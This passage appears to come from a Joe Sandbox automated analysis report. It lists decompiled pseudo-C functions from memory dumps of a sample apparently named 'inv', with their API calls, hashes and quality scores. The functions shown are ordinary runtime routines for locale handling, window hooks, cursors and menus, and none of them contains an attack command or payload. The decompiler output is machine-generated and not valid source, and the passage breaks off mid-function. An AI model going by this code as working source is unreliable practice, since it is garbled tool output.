                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Window$Long$AttributesB330Layered
                                  • String ID:
                                  • API String ID: 1770052509-0
                                  • Opcode ID: 4bf1c80420186bbb8f992b8d6403ea2b853f778bb12e7e5c604072dbf94b495f
                                  • Instruction ID: dc78413d2246636a4a4492c1fa27383537d7cfffe27dbc18fe6c52167567d637
                                  • Opcode Fuzzy Hash: 4bf1c80420186bbb8f992b8d6403ea2b853f778bb12e7e5c604072dbf94b495f
                                  • Instruction Fuzzy Hash: F3118A70A0529039DB557F798D99B4E26880F0A328F14297EB945EB2D7CEBCC944C76C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 40%
                                  			E0041D79C(intOrPtr __eax) {
                                  				char _v5;
                                  				intOrPtr _v12;
                                  				intOrPtr _t14;
                                  				intOrPtr _t16;
                                  				intOrPtr _t18;
                                  				intOrPtr _t21;
                                  				intOrPtr _t30;
                                  				void* _t32;
                                  				void* _t34;
                                  				intOrPtr _t35;
                                  
                                  				_t32 = _t34;
                                  				_t35 = _t34 + 0xfffffff8;
                                  				_v5 = 0;
                                  				if( *0x44f88c == 0) {
                                  					return _v5;
                                  				} else {
                                  					_push(0);
                                  					L004062C0();
                                  					_v12 = __eax;
                                  					_push(_t32);
                                  					_push(0x41d822);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t35;
                                  					_push(0x68);
                                  					_t14 = _v12;
                                  					_push(_t14);
                                  					L00406058();
                                  					if(_t14 >= 0x10) {
                                  						_push(__eax + 4);
                                  						_push(8);
                                  						_push(0);
                                  						_t18 =  *0x44f88c; // 0x46080752
                                  						_push(_t18);
                                  						L00406068();
                                  						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
                                  						_push(8);
                                  						_push(8);
                                  						_t21 =  *0x44f88c; // 0x46080752
                                  						_push(_t21);
                                  						L00406068();
                                  						_v5 = 1;
                                  					}
                                  					_pop(_t30);
                                  					 *[fs:eax] = _t30;
                                  					_push(0x41d829);
                                  					_t16 = _v12;
                                  					_push(_t16);
                                  					_push(0);
                                  					L004064F8();
                                  					return _t16;
                                  				}
                                  			}














                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 0041D7B4
                                  • 72E7AD70.GDI32(?,00000068,00000000,0041D822,?,00000000), ref: 0041D7D0
                                  • 72E7AEA0.GDI32(46080752,00000000,00000008,?,?,00000068,00000000,0041D822,?,00000000), ref: 0041D7E8
                                  • 72E7AEA0.GDI32(46080752,00000008,00000008,?,46080752,00000000,00000008,?,?,00000068,00000000,0041D822,?,00000000), ref: 0041D800
                                  • 72E7B380.USER32(00000000,?,0041D829,0041D822,?,00000000), ref: 0041D81C
                                  Similarity
                                  • API ID: B380
                                  • String ID:
                                  • API String ID: 120756276-0
                                  • Opcode ID: a53000a37de70687b86abe6fbc0761482c08e5cdff71ce1b13d44a83d769f45a
                                  • Instruction ID: 3f1e7269320f8a307ba32baaa60e5cdb219e8c3b7aa4220214eb653406664114
                                  • Opcode Fuzzy Hash: a53000a37de70687b86abe6fbc0761482c08e5cdff71ce1b13d44a83d769f45a
                                  • Instruction Fuzzy Hash: D2110875588304AEEB00EFE59C42FAD77E8E70A714F4080BAF504EA1C1DA7A5458C738
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E0040AB3C(void* __esi, void* __eflags) {
                                  				char _v8;
                                  				intOrPtr* _t18;
                                  				intOrPtr _t26;
                                  				void* _t27;
                                  				long _t29;
                                  				intOrPtr _t32;
                                  				void* _t33;
                                  
                                  				_t33 = __eflags;
                                  				_push(0);
                                  				_push(_t32);
                                  				_push(0x40abd3);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t32;
                                  				E0040A8B4(GetThreadLocale(), 0x40abe8, 0x100b,  &_v8);
                                  				_t29 = E00407CB8(0x40abe8, 1, _t33);
                                  				if(_t29 + 0xfffffffd - 3 < 0) {
                                  					EnumCalendarInfoA(E0040AA88, GetThreadLocale(), _t29, 4);
                                  					_t27 = 7;
                                  					_t18 = 0x44f76c;
                                  					do {
                                  						 *_t18 = 0xffffffff;
                                  						_t18 = _t18 + 4;
                                  						_t27 = _t27 - 1;
                                  					} while (_t27 != 0);
                                  					EnumCalendarInfoA(E0040AAC4, GetThreadLocale(), _t29, 3);
                                  				}
                                  				_pop(_t26);
                                  				 *[fs:eax] = _t26;
                                  				_push(E0040ABDA);
                                  				return E00403E10( &_v8);
                                  			}











                                  APIs
                                  • GetThreadLocale.KERNEL32(?,00000000,0040ABD3,?,?,00000000), ref: 0040AB54
                                    • Part of subcall function 0040A8B4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040A8D2
                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040ABD3,?,?,00000000), ref: 0040AB84
                                  • EnumCalendarInfoA.KERNEL32(Function_0000AA88,00000000,00000000,00000004), ref: 0040AB8F
                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040ABD3,?,?,00000000), ref: 0040ABAD
                                  • EnumCalendarInfoA.KERNEL32(Function_0000AAC4,00000000,00000000,00000003), ref: 0040ABB8
                                  Similarity
                                  • API ID: Locale$InfoThread$CalendarEnum
                                  • String ID:
                                  • API String ID: 4102113445-0
                                  • Opcode ID: d0faf24535e3ffe9d5a4023c532492a4e138569dbb6e09e27ad6ab5d72db4ba6
                                  • Instruction ID: 1fa415aabdf6372b33d5677372d52cb1d4922124709160b95db0a19333158752
                                  • Opcode Fuzzy Hash: d0faf24535e3ffe9d5a4023c532492a4e138569dbb6e09e27ad6ab5d72db4ba6
                                  • Instruction Fuzzy Hash: 2601D431604B046BE201A765CD12F6B326DDB46714FA04577B900B66C1D67CAE1086AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00449B1C() {
                                  				void* _t2;
                                  				void* _t5;
                                  				void* _t8;
                                  				struct HHOOK__* _t10;
                                  
                                  				if( *0x44fbc8 != 0) {
                                  					_t10 =  *0x44fbc8; // 0x0
                                  					UnhookWindowsHookEx(_t10);
                                  				}
                                  				 *0x44fbc8 = 0;
                                  				if( *0x44fbcc != 0) {
                                  					_t2 =  *0x44fbc4; // 0x0
                                  					SetEvent(_t2);
                                  					if(GetCurrentThreadId() !=  *0x44fbc0) {
                                  						_t8 =  *0x44fbcc; // 0x0
                                  						WaitForSingleObject(_t8, 0xffffffff);
                                  					}
                                  					_t5 =  *0x44fbcc; // 0x0
                                  					CloseHandle(_t5);
                                  					 *0x44fbcc = 0;
                                  					return 0;
                                  				}
                                  				return 0;
                                  			}








                                  APIs
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 00449B2B
                                  • SetEvent.KERNEL32(00000000,0044BE1A,00000000,0044AF47,?,?,0044C944,00000001,0044B007,?,?,?,0044C944), ref: 00449B46
                                  • GetCurrentThreadId.KERNEL32 ref: 00449B4B
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0044BE1A,00000000,0044AF47,?,?,0044C944,00000001,0044B007,?,?,?,0044C944), ref: 00449B60
                                  • CloseHandle.KERNEL32(00000000,00000000,0044BE1A,00000000,0044AF47,?,?,0044C944,00000001,0044B007,?,?,?,0044C944), ref: 00449B6B
                                  Similarity
                                  • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                  • String ID:
                                  • API String ID: 2429646606-0
                                  • Opcode ID: 86f335ad5c5060fbf341c222ea07d14704cf5483b23d9420d9915cf58a6bd967
                                  • Instruction ID: 4ea1f00dfe9c5f4b141374f63fb96cf3fc41f1b3c24dc773aef81f597fe85241
                                  • Opcode Fuzzy Hash: 86f335ad5c5060fbf341c222ea07d14704cf5483b23d9420d9915cf58a6bd967
                                  • Instruction Fuzzy Hash: 29F074B95005C19AE751EB69E869A0732A8E717304B50453FE120D72E1E678B848DF1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E0042CBA8(void* __eax, intOrPtr __ecx, intOrPtr __edx, char _a4) {
                                  				intOrPtr _v8;
                                  				char _v9;
                                  				intOrPtr _v16;
                                  				struct tagPOINT _v32;
                                  				intOrPtr _v36;
                                  				long _v40;
                                  				char _v56;
                                  				void* __edi;
                                  				struct HWND__* _t57;
                                  				void* _t63;
                                  				char _t84;
                                  				struct HWND__* _t108;
                                  				void* _t110;
                                  				intOrPtr _t134;
                                  				intOrPtr _t137;
                                  				void* _t141;
                                  				struct HWND__* _t143;
                                  				struct HWND__* _t147;
                                  				void* _t152;
                                  				void* _t154;
                                  				intOrPtr _t155;
                                  
                                  				_t152 = _t154;
                                  				_t155 = _t154 + 0xffffffcc;
                                  				_v8 = __ecx;
                                  				_t137 = __edx;
                                  				_t110 = __eax;
                                  				if(__edx == 0 || __edx == 0xffffffff) {
                                  					_t57 =  *(_t110 + 0xa0);
                                  					if(_t57 == 0 ||  *((char*)(_t57 + 0x1a7)) == 0 ||  *((intOrPtr*)(_t57 + 0x17c)) == 0) {
                                  						E004120C8( *((intOrPtr*)(_t110 + 0x40)),  &_v40,  *((intOrPtr*)(_t110 + 0x44)));
                                  						_v32.x = _v40;
                                  						_v32.y = _v36;
                                  						_t143 =  *(_t110 + 0x30);
                                  						__eflags = _t143;
                                  						if(_t143 != 0) {
                                  							E0042BA08(_t143,  &_v40,  &_v32);
                                  							_v32.x = _v40;
                                  							_v32.y = _v36;
                                  						}
                                  					} else {
                                  						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x17c)))) + 0x14))();
                                  						MapWindowPoints(E004325A4( *(_t110 + 0xa0)), 0,  &_v32, 2);
                                  					}
                                  					_t63 = E0042BE70(_t110);
                                  					E00412118(_v32.x, E0042BE84(_t110), _v32.y,  &_v56, _t63);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					_v9 = E0042CD88(_t110,  &_v32);
                                  					goto L20;
                                  				} else {
                                  					E0042D090(__eax);
                                  					__eflags =  *(_t110 + 0xa0);
                                  					if(__eflags == 0) {
                                  						L12:
                                  						_t84 = 1;
                                  					} else {
                                  						_t108 = E004032D4( *(_t110 + 0xa0), __eflags);
                                  						__eflags = _t108;
                                  						if(_t108 != 0) {
                                  							goto L12;
                                  						} else {
                                  							_t84 = 0;
                                  						}
                                  					}
                                  					_v9 = _t84;
                                  					__eflags = _v9;
                                  					if(_v9 == 0) {
                                  						L20:
                                  						return _v9;
                                  					} else {
                                  						_v16 = E00429604(1, _t137);
                                  						_push(_t152);
                                  						_push(0x42cd73);
                                  						_push( *[fs:edx]);
                                  						 *[fs:edx] = _t155;
                                  						_t87 =  *(_t110 + 0xa0);
                                  						__eflags =  *(_t110 + 0xa0);
                                  						if( *(_t110 + 0xa0) == 0) {
                                  							_t147 = 0;
                                  							__eflags = 0;
                                  						} else {
                                  							_t147 = E004325A4(_t87);
                                  						}
                                  						E0042B890(_t110,  &_v32);
                                  						__eflags = _t147;
                                  						if(__eflags != 0) {
                                  							MapWindowPoints(_t147, 0,  &_v32, 2);
                                  						}
                                  						 *((intOrPtr*)(_v16 + 4)) = _t137;
                                  						 *((char*)(_v16 + 0x54)) = _a4;
                                  						 *((intOrPtr*)(_v16 + 0x58)) = _v8;
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_t141 = _t137;
                                  						MapWindowPoints(0, E004325A4(_t141),  &_v32, 1);
                                  						_push(_v32.y);
                                  						E004032D4(_t141, __eflags);
                                  						__eflags = 0;
                                  						_pop(_t134);
                                  						 *[fs:eax] = _t134;
                                  						_push(0x42cd7a);
                                  						return E004030D8(_v16);
                                  					}
                                  				}
                                  			}

























                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: PointsWindow
                                  • String ID: 8rB
                                  • API String ID: 4123100037-1357010674
                                  • Opcode ID: d1307cd5415c168ab225a56a6b6d988fa2e557369e10f0290c0ec399209822a2
                                  • Instruction ID: 7dc3623a035d7281e8cbb3c56c568e73e875cb2af8f6d691574d10e1a079e9a8
                                  • Opcode Fuzzy Hash: d1307cd5415c168ab225a56a6b6d988fa2e557369e10f0290c0ec399209822a2
                                  • Instruction Fuzzy Hash: 9C518171B005189FCB01DFA9D881AEEB7F5AF49304F5580BAEC14AB381C779AE05CB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E0040ABEC(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				char _v20;
                                  				char _v24;
                                  				void* _t41;
                                  				signed int _t45;
                                  				signed int _t47;
                                  				signed int _t49;
                                  				signed int _t51;
                                  				intOrPtr _t75;
                                  				void* _t76;
                                  				signed int _t77;
                                  				signed int _t83;
                                  				signed int _t92;
                                  				intOrPtr _t111;
                                  				void* _t122;
                                  				void* _t124;
                                  				intOrPtr _t127;
                                  				void* _t128;
                                  
                                  				_t128 = __eflags;
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_t122 = __edx;
                                  				_t124 = __eax;
                                  				_push(_t127);
                                  				_push(0x40adb6);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t127;
                                  				_t92 = 1;
                                  				E00403E10(__edx);
                                  				E0040A8B4(GetThreadLocale(), 0x40adcc, 0x1009,  &_v12);
                                  				if(E00407CB8(0x40adcc, 1, _t128) + 0xfffffffd - 3 < 0) {
                                  					while(1) {
                                  						_t41 = E004040D0(_t124);
                                  						__eflags = _t92 - _t41;
                                  						if(_t92 > _t41) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
                                  						asm("bt [0x44d10c], eax");
                                  						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
                                  							_t45 = E00408268(_t124 + _t92 - 1, 2, 0x40add0);
                                  							__eflags = _t45;
                                  							if(_t45 != 0) {
                                  								_t47 = E00408268(_t124 + _t92 - 1, 4, 0x40ade0);
                                  								__eflags = _t47;
                                  								if(_t47 != 0) {
                                  									_t49 = E00408268(_t124 + _t92 - 1, 2, 0x40adf8);
                                  									__eflags = _t49;
                                  									if(_t49 != 0) {
                                  										_t51 =  *(_t124 + _t92 - 1) - 0x59;
                                  										__eflags = _t51;
                                  										if(_t51 == 0) {
                                  											L24:
                                  											E004040D8(_t122, 0x40ae10);
                                  										} else {
                                  											__eflags = _t51 != 0x20;
                                  											if(_t51 != 0x20) {
                                  												E00403FF8();
                                  												E004040D8(_t122, _v24);
                                  											} else {
                                  												goto L24;
                                  											}
                                  										}
                                  									} else {
                                  										E004040D8(_t122, 0x40ae04);
                                  										_t92 = _t92 + 1;
                                  									}
                                  								} else {
                                  									E004040D8(_t122, 0x40adf0);
                                  									_t92 = _t92 + 3;
                                  								}
                                  							} else {
                                  								E004040D8(_t122, 0x40addc);
                                  								_t92 = _t92 + 1;
                                  							}
                                  							_t92 = _t92 + 1;
                                  							__eflags = _t92;
                                  						} else {
                                  							_v8 = E0040BC5C(_t124, _t92);
                                  							E00404330(_t124, _v8, _t92,  &_v20);
                                  							E004040D8(_t122, _v20);
                                  							_t92 = _t92 + _v8;
                                  						}
                                  					}
                                  				} else {
                                  					_t75 =  *0x44f744; // 0x9
                                  					_t76 = _t75 - 4;
                                  					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                                  						_t77 = 1;
                                  					} else {
                                  						_t77 = 0;
                                  					}
                                  					if(_t77 == 0) {
                                  						E00403E64(_t122, _t124);
                                  					} else {
                                  						while(_t92 <= E004040D0(_t124)) {
                                  							_t83 =  *(_t124 + _t92 - 1) - 0x47;
                                  							__eflags = _t83;
                                  							if(_t83 != 0) {
                                  								__eflags = _t83 != 0x20;
                                  								if(_t83 != 0x20) {
                                  									E00403FF8();
                                  									E004040D8(_t122, _v16);
                                  								}
                                  							}
                                  							_t92 = _t92 + 1;
                                  							__eflags = _t92;
                                  						}
                                  					}
                                  				}
                                  				L28:
                                  				_pop(_t111);
                                  				 *[fs:eax] = _t111;
                                  				_push(E0040ADBD);
                                  				return E00403E34( &_v24, 4);
                                  			}


                                  APIs
                                  • GetThreadLocale.KERNEL32(?,00000000,0040ADB6,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040AC1B
                                    • Part of subcall function 0040A8B4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040A8D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread
                                  • String ID: eeee$ggg$yyyy
                                  • API String ID: 4232894706-1253427255
                                  • Opcode ID: d23e4e25ba7abd3228bbbc98e1209934ec096afc2004c937ba1f02e5efa24b4e
                                  • Instruction ID: 240647d738f01ce04a004467147e7c82f5a71e5866ad3678d97b55430a5f9ffb
                                  • Opcode Fuzzy Hash: d23e4e25ba7abd3228bbbc98e1209934ec096afc2004c937ba1f02e5efa24b4e
                                  • Instruction Fuzzy Hash: 8B4114713047004BD711BA7988812BEB3ABDF80304B64843BE951B3BC5D63C9D26966F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0042A0D0(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
                                  				intOrPtr _v16;
                                  				intOrPtr _t24;
                                  				intOrPtr _t26;
                                  				intOrPtr _t28;
                                  				intOrPtr* _t32;
                                  				intOrPtr _t35;
                                  				intOrPtr _t37;
                                  				struct HWND__* _t38;
                                  				intOrPtr _t39;
                                  				intOrPtr* _t41;
                                  				intOrPtr _t45;
                                  				intOrPtr _t49;
                                  				intOrPtr* _t53;
                                  				long _t58;
                                  				intOrPtr _t59;
                                  				intOrPtr _t60;
                                  				intOrPtr* _t65;
                                  				intOrPtr _t66;
                                  				intOrPtr _t70;
                                  				intOrPtr* _t77;
                                  				void* _t79;
                                  				intOrPtr* _t80;
                                  				long long _t87;
                                  
                                  				_t87 = __fp0;
                                  				_t80 = _t79 + 0xfffffff8;
                                  				_t70 = __ecx;
                                  				_t45 = __edx;
                                  				_t77 = __eax;
                                  				 *0x44fb30 = __eax;
                                  				_t24 =  *0x44fb30; // 0x0
                                  				 *((intOrPtr*)(_t24 + 4)) = 0;
                                  				GetCursorPos(0x44fb3c);
                                  				_t26 =  *0x44fb30; // 0x0
                                  				_t58 = 0x44fb3c->x; // 0x0
                                  				 *(_t26 + 0xc) = _t58;
                                  				_t59 =  *0x44fb40; // 0x0
                                  				 *((intOrPtr*)(_t26 + 0x10)) = _t59;
                                  				 *0x44fb44 = GetCursor();
                                  				_t28 =  *0x44fb30; // 0x0
                                  				 *0x44fb38 = E004292FC(_t28);
                                  				 *0x44fb48 = _t70;
                                  				_t60 =  *0x4271ec; // 0x427238
                                  				if(E00403264(_t77, _t60) == 0) {
                                  					__eflags = _t45;
                                  					if(__eflags == 0) {
                                  						 *0x44fb4c = 0;
                                  					} else {
                                  						 *0x44fb4c = 1;
                                  					}
                                  				} else {
                                  					_t65 = _t77;
                                  					_t4 = _t65 + 0x44; // 0x44
                                  					_t41 = _t4;
                                  					_t49 =  *_t41;
                                  					if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) {
                                  						__eflags = 0;
                                  						 *((intOrPtr*)(_t65 + 0x20)) = 0;
                                  						 *((intOrPtr*)(_t65 + 0x24)) = 0;
                                  					} else {
                                  						 *_t80 =  *((intOrPtr*)(_t65 + 0xc)) - _t49;
                                  						asm("fild dword [esp]");
                                  						_v16 =  *((intOrPtr*)(_t41 + 8)) -  *_t41;
                                  						asm("fild dword [esp+0x4]");
                                  						asm("fdivp st1, st0");
                                  						 *((long long*)(_t65 + 0x20)) = __fp0;
                                  						asm("wait");
                                  					}
                                  					_t66 =  *((intOrPtr*)(_t41 + 4));
                                  					if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) {
                                  						__eflags = 0;
                                  						 *((intOrPtr*)(_t77 + 0x28)) = 0;
                                  						 *((intOrPtr*)(_t77 + 0x2c)) = 0;
                                  					} else {
                                  						_t53 = _t77;
                                  						 *_t80 =  *((intOrPtr*)(_t53 + 0x10)) - _t66;
                                  						asm("fild dword [esp]");
                                  						_v16 =  *((intOrPtr*)(_t41 + 0xc)) -  *((intOrPtr*)(_t41 + 4));
                                  						asm("fild dword [esp+0x4]");
                                  						asm("fdivp st1, st0");
                                  						 *((long long*)(_t53 + 0x28)) = _t87;
                                  						asm("wait");
                                  					}
                                  					if(_t45 == 0) {
                                  						 *0x44fb4c = 0;
                                  					} else {
                                  						 *0x44fb4c = 2;
                                  						 *((intOrPtr*)( *_t77 + 0x30))();
                                  					}
                                  				}
                                  				_t32 =  *0x44fb30; // 0x0
                                  				 *0x44fb50 =  *((intOrPtr*)( *_t32 + 8))();
                                  				_t85 =  *0x44fb50;
                                  				if( *0x44fb50 != 0) {
                                  					_t37 =  *0x44fb40; // 0x0
                                  					_t38 = GetDesktopWindow();
                                  					_t39 =  *0x44fb50; // 0x0
                                  					E00433DA0(_t39, _t38, _t85, _t37);
                                  				}
                                  				_t35 = E004030A8(1);
                                  				 *0x44fb58 = _t35;
                                  				if( *0x44fb4c != 0) {
                                  					_t35 = E00429E00(0x44fb3c, 1);
                                  				}
                                  				return _t35;
                                  			}


                                  APIs
                                  • GetCursorPos.USER32(0044FB3C), ref: 0042A0F1
                                  • GetCursor.USER32(0044FB3C), ref: 0042A10D
                                    • Part of subcall function 004292FC: SetCapture.USER32(00000000,?,0042A121,0044FB3C), ref: 0042930B
                                  • GetDesktopWindow.USER32 ref: 0042A1FF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Cursor$CaptureDesktopWindow
                                  • String ID: 8rB
                                  • API String ID: 669539147-1357010674
                                  • Opcode ID: 05bdb3fd56607f7eecea5d09a2a70de7c462ef357b38d37535d0528f92bd41f8
                                  • Instruction ID: 55c7e1c6787e35a502bb299b8c83d029705ea029cff1caf14ef83abd02a9218f
                                  • Opcode Fuzzy Hash: 05bdb3fd56607f7eecea5d09a2a70de7c462ef357b38d37535d0528f92bd41f8
                                  • Instruction Fuzzy Hash: 7E4181B83046408FC304DF29E965625BBE1FF8B314F15867ED8498B3A1CB35E859CB4A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E0043EE74(intOrPtr* __eax) {
                                  				struct tagMENUITEMINFOA _v128;
                                  				intOrPtr _v132;
                                  				int _t16;
                                  				intOrPtr* _t29;
                                  				struct HMENU__* _t36;
                                  				MENUITEMINFOA* _t37;
                                  
                                  				_t37 =  &_v128;
                                  				_t29 = __eax;
                                  				_t16 =  *0x44e114; // 0x44f740
                                  				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
                                  					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
                                  					_t37->cbSize = 0x2c;
                                  					_v132 = 0x10;
                                  					_v128.hbmpUnchecked =  &(_v128.cch);
                                  					_v128.dwItemData = 0x50;
                                  					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                  					if(_t16 != 0) {
                                  						_t16 = E0043F1F8(_t29);
                                  						asm("sbb edx, edx");
                                  						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
                                  							_v128.cbSize = ((E0043F1F8(_t29) & 0x0000007f) << 0x0000000d) + ((E0043F1F8(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
                                  							_v132 = 0x10;
                                  							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                  							if(_t16 != 0) {
                                  								return DrawMenuBar( *(_t29 + 0x38));
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t16;
                                  			}


                                  APIs
                                  • GetMenuItemInfoA.USER32 ref: 0043EEC2
                                  • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0043EF14
                                  • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 0043EF21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Menu$InfoItem$Draw
                                  • String ID: P
                                  • API String ID: 3227129158-3110715001
                                  • Opcode ID: 4029ad7f6b09c75dfdbdd78d72f447f468cc896e36dae6f1b68137953b6acf84
                                  • Instruction ID: 98b5513ed2c46aa636bbe918e4e5d5f133ea90f52c5888ba7589c1ffe5987239
                                  • Opcode Fuzzy Hash: 4029ad7f6b09c75dfdbdd78d72f447f468cc896e36dae6f1b68137953b6acf84
                                  • Instruction Fuzzy Hash: EE1101306063016FD320DF29CD81B4B7AD4AB88364F14963AF094CB3D6D7B8D854C74A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040C4DC() {
                                  				_Unknown_base(*)()* _t1;
                                  				struct HINSTANCE__* _t3;
                                  
                                  				_t1 = GetModuleHandleA("kernel32.dll");
                                  				_t3 = _t1;
                                  				if(_t3 != 0) {
                                  					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                                  					 *0x44d130 = _t1;
                                  				}
                                  				if( *0x44d130 == 0) {
                                  					 *0x44d130 = E004080B4;
                                  					return E004080B4;
                                  				}
                                  				return _t1;
                                  			}


                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040CF45,00000000,0040CF58), ref: 0040C4E2
                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040C4F3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                  • API String ID: 1646373207-3712701948
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E00429E00(intOrPtr* __eax, signed int __edx) {
                                  				intOrPtr _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				intOrPtr _t49;
                                  				intOrPtr _t50;
                                  				intOrPtr _t53;
                                  				intOrPtr _t54;
                                  				intOrPtr _t55;
                                  				intOrPtr _t56;
                                  				intOrPtr* _t60;
                                  				intOrPtr* _t62;
                                  				struct HICON__* _t65;
                                  				intOrPtr _t67;
                                  				intOrPtr* _t72;
                                  				intOrPtr _t74;
                                  				intOrPtr* _t75;
                                  				intOrPtr _t78;
                                  				intOrPtr _t80;
                                  				intOrPtr _t82;
                                  				intOrPtr _t84;
                                  				intOrPtr _t85;
                                  				struct HWND__* _t88;
                                  				intOrPtr _t89;
                                  				intOrPtr _t91;
                                  				intOrPtr* _t93;
                                  				intOrPtr _t97;
